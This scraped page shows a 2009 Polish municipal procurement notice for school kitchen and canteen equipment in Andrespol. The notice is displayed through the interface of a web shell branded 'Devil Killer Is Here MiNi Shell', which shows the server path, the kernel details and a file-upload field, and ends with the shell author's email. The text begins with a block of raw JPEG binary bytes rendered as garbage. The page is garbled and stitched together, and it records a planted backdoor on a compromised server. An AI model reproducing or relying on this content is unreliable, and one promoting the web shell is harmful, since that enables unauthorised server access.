JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090715/239972-N-2009.html

<p class="kh_header"><b>Andrespol: Dostawa wyposażenia kuchni i zaplecza, stołówki wraz z montażem dla Szkoły Podstawowej w Justynowie ul. Łódzka 17 w ramach inwestycji pn. Budowa i rozbudowa budynków oświatowych z przeznaczeniem na cele przedszkolne w gminie Andrespol</b><br>
<b>Numer ogłoszenia: 239972 - 2009; data zamieszczenia: 15.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Andrespol , ul. Rokicińska 126, 95-020 Andrespol, woj. łódzkie, tel. 042 2132440, faks 042 2132434.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.andrespol.pl; www.andrespol.bip.cc</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia kuchni i zaplecza, stołówki wraz z montażem dla Szkoły Podstawowej w Justynowie ul. Łódzka 17 w ramach inwestycji pn. Budowa i rozbudowa budynków oświatowych z przeznaczeniem na cele przedszkolne w gminie Andrespol.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa wyposażenia kuchni i zaplecza oraz stołówki dla Szkoły Podstawowej w Justynowie ul. Łódzka 17 wraz z montażem, zgodnie z wykazem stanowiącym załącznik Nr 8.
2.Zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy może nastąpić jedynie zgodnie z zapisem podanym w załączniku nr 7 - Wzór Umowy § 9. 
L. p.
Poz. wg rys. zagospodarowania technologicznego
Nazwa 
Ilość
[szt]
Cena jednostkowa brutto
[zł]
Wartość ogółem brutto
[zł]
1
4
Szafka ubraniowa metalowa (80x55x180cm) 
1


2
5
Szafka na sprzęt i środki czystości (60x40x180cm) 
1


3
6
Zlewozmywak z baterią sztorcową zasilaną z dołu  (60x50cm) posadowiony na poziomie 40 cm
1


4
7
Szafa chłodnicza  ok 300 l, zewnętrzna obudowa ze stali nierdzewnej
2


5
8
Szafa mroźnicza ok 300 l, zewnętrzna obudowa ze stali nierdzewnej
1


6
9
Regał 5-półkowy, mocowanie półek z regulowaną wysokością (130x60x180cm), półki pełne, udźwig na półkę 250 kg
4


7
10
Basen 1- komorowy (140x70cm)
1


8
11
Szafa przelotowa z drzwiami przesuwnymi (100x70x180cm) 
1


9
12
Stół roboczy ze zlewem 2-komorowym z młynkiem oraz baterią sztorcową zasilaną z dołu, szafką i półką (180x70cm) 
1


10
13
 Zmywarka kapturowa z koszem do talerzy i koszem uniwersalnym(64x67cm) do naczyń z funkcją wyparzania, dozownik płynu, regulacja temperatury płynu, elektroniczne sterowanie 
1


11
15
Stolik sześciokątny z regulowanym stelażem metalowym w kolorze żółtym, (długość przekątnej do150 cm długość boku do 80cm) dla dzieci w wieku przedszkolnym (wiek dzieci 5-6 lat). Blaty stołów z płyty laminowanej wykończone obrzeżem PCV w kolorze żółtym.
4



15
Stolik sześciokątny z regulowanym stelażem metalowym w kolorze czerwonym, (długość przekątnej do150 cm długość boku do 80cm) dla dzieci w wieku przedszkolnym (wiek dzieci 5-6 lat). Blaty stołów z płyty laminowanej wykończone obrzeżem PCV w kolorze czerwonym.
4


12
15
Krzesło przedszkolne dla dzieci w przedziale wiekowym 5 - 6  lat. Siedzisko i oparcie krzesełka wykonane ze sklejki w kolorze buku z metalowym stelażem w kolorze żółtym. Wysokość siedziska 34 cm.
24



15
Krzesło przedszkolne dla dzieci w przedziale wiekowym 5 - 6  lat. Siedzisko i oparcie krzesełka wykonane ze sklejki w kolorze buku z metalowym stelażem w kolorze czerwonym. Wysokość siedziska 34 cm.
24


13
16
Stolik z regulowanym stelażem metalowym, (80x80cm), wysokość dostosowana do dzieci w wieku szkolnym (wiek dzieci 7-13 lat). Blaty stołów z płyty laminowanej wykończone obrzeżem PCV w kolorze zielonym 
6



16
Stolik z regulowanym stelażem metalowym, (80x80cm), wysokość dostosowana do dzieci w wieku szkolnym (wiek dzieci 7-13 lat). Blaty stołów z płyty laminowanej wykończone obrzeżem PCV w kolorze niebieskim. 
6


14
16
Krzesło dla dzieci w przedziale wiekowym 7-13 lat. Siedzisko i oparcie krzesełka wykonane ze sklejki w kolorze buku z metalowym stelażem w kolorze zielonym. Wysokość siedziska 42 cm.
24



16
Krzesło dla dzieci w przedziale wiekowym 7-13 lat. Siedzisko i oparcie krzesełka wykonane ze sklejki w kolorze buku z metalowym stelażem w kolorze niebieskim. Wysokość siedziska 42 cm.
24


15
17
Wózek 3-półkowy (86x54x92cm) z hamulcem, max udźwig
145 kg
1


16
18
Regał 4-półkowy mocowanie półek z regulowaną wysokością(90x50x180cm), półki pełne, udźwig na półkę 70kg
2


17
19
Stół roboczy z szafką, drzwi przesuwane (130x70cm) 
1


18
20
Stół roboczy z szufladami (130x70cm)
1


19
21
Patelnia elektryczna uchylna nierdzewna na stelażu, płynna regulacja temperatury(80x70cm)
1


20
22
Taboret gazowy - gaz z sieci (60x60cm) 
1


21
23
Profesjonalna kuchnia gazowa 4-palnikowa z piekarnikiem gazowym ze

 stali nierdzewnej, obudową i nóżkami regulowanymi ze stali nierdzewnej, gaz z sieci (80x70cm), automatyczne odcięcie gazu



22
26
Stół roboczy z szafką (110x70cm)
1


23
27
Stół roboczy ze zlewem 2-komorowym z baterią sztorcową zasilaną z dołu i szafką (150x70cm)
1


24
28
Stół roboczy z szufladami (150x70cm) 
1


25
29
Szafka wisząca (90x40x60cm) 
1


26
30
Uniwersalny kompletny robot kuchenny (pojemnik min. 4,5 l) zawierający min.:
przystawkę w postaci szatkownicy, do krojenia warzyw, owoców, itp.
przystawkę do mielenia i siekania mięsa, ziół, warzyw, ryb, wyrabiania ciast, przygotowywania majonezów, sosów itp., miksowania składników potraw i mielenia potraw.
1






27
31
Stół roboczy z szafką (120x70cm) 
1


28
32
Stół roboczy ze zlewem 2-komorowym z baterią sztorcową zasilaną z dołu i szafką(150x70cm) 
1


29
33
Szafka wisząca (110x40x60cm) 
1


30
34
Regał 4-półkowy mocowanie półek z regulowaną wysokością(170x40x180cm), półki pełne, udźwig na półkę 70kg
1


31
36
Stół roboczy ze zlewem 2-komorowym z baterią sztorcową zasilaną z dołu i szafką(180x70cm)
1


32
37
Stół roboczy z szufladami i półką (190x60cm) 
1


33
38
Chłodziarka podblatowa do jaj (122 l) 
1


34
39
Odkażarka do jaj 
1


35
40
Stół roboczy ze zlewozmywakiem 1-komorowym z baterią sztorcową zasilaną z dołu (120x70cm) 
1


36
41
Szafka wisząca (80x40x60cm) 
1


37
42
Szafka wisząca (50x40x60cm)
1


38
43
Bateria z wylewką ze spryskiwaczem
1


39

Lodówka do przechowywania próbek żywności ok. 100 l
1


40

Waga elektroniczna - zakres ważenia 30 kg
1


RAZEM

KOSZT MONTAŻU

OGÓŁEM.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.14.10.00-2, 39.14.11.00-3, 39.14.13.00-5, 39.16.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 2000,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> WARUNEK-1
Posiadania przez wykonawcę uprawnień do wykonywania działalności lub czynności objętych niniejszym zamówieniem art. 22 ust. 1 i ust. 2 oraz niepodleganie wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (t. j. Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.)

WARUNEK-2  
Posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
1.Wykonawca musi spełniać łącznie następujące warunki: 
a)posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym, a także dysponuje osobami zdolnymi do wykonania zamówienia, lub przedstawi pisemne oświadczenie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
c)wykonał w ciągu ostatnich trzech latach co najmniej dwie dostawy wyposażenia kuchni i zaplecza wraz z montażem, o wartości min. 50 000 zł (pięćdziesiąt tysięcy) netto każda.
WARUNEK-3
1.Znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
2.Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WARUNEK 1
1.Oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1-2 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (t. j. Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) - zgodnie ze wzorem stanowiącym załącznik numer 3 do niniejszej specyfikacji o spełnianiu warunków udziału w niniejszym postępowaniu - data wystawienia przed upływem terminu składania ofert.
2.Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu na podstawie art. 44 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych (t. j. Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) - zgodnie ze wzorem stanowiącym załącznik numer 2 do niniejszej specyfikacji o spełnianiu warunków udziału w niniejszym postępowaniu - data wystawienia przed upływem terminu składania ofert.
3.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - data wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - data wystawienia nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.Aktualna informacja z Krajowego Rejestru Karnego lub zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy pzp- data wystawienia nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6.Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy pzp (dotyczy podmiotów zbiorowych) - data wystawienia, nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
WARUNEK 2
1.Wykaz wykonanych w okresie ostatnich 3 lat dostaw, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia (dostawa wyposażenia kuchni i zaplecza wraz z montażem), z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie, co najmniej dwie dostawy, o wartości min. 50 000 zł (pięćdziesiąt tysięcy) netto każda.
2.Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca (sporządzony według wzorów stanowiących załącznik nr 6) i które będą uczestniczyć w wykonywaniu zamówienia, zdolnych do przeszkolenia wstępnego w zakresie obsługi przedmiotu umowy, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - data wystawienia przed upływem terminu składania ofert.
3.Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli wykonawca wskazał osoby, którymi będzie dysponować o których mowa powyżej w pkt 2 -data wystawienia przed upływem terminu składania ofert.
4.Potwierdzeniem należytego wykonania dostaw jest każdy dokument wystawiony na wykonawcę, w którym istnieje zapis potwierdzający należyte wykonanie dostaw, okres, zakres dostaw oraz ich wartość.
WARUNEK 3
1.Informacja z Banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w  których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości nie mniejszej niż 50 000 zł (pięćdziesiąt tysięcy) - data wystawienia nie wcześniej niż trzy miesiące przed terminem składania ofert.
2.Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności minimum na 50 000 zł (pięćdziesiąt tysięcy) - data wystawienia przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.andrespol.bip.cc.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Andrespol
Andrespol ul. Rokicińska 126, pokój nr 14 (I piętro).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2009 godzina 10:00, miejsce: Urząd Gminy Andrespol
Andrespol ul. Rokicińska 126, pokój nr 9 Sekretarz Gminy (I piętro).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com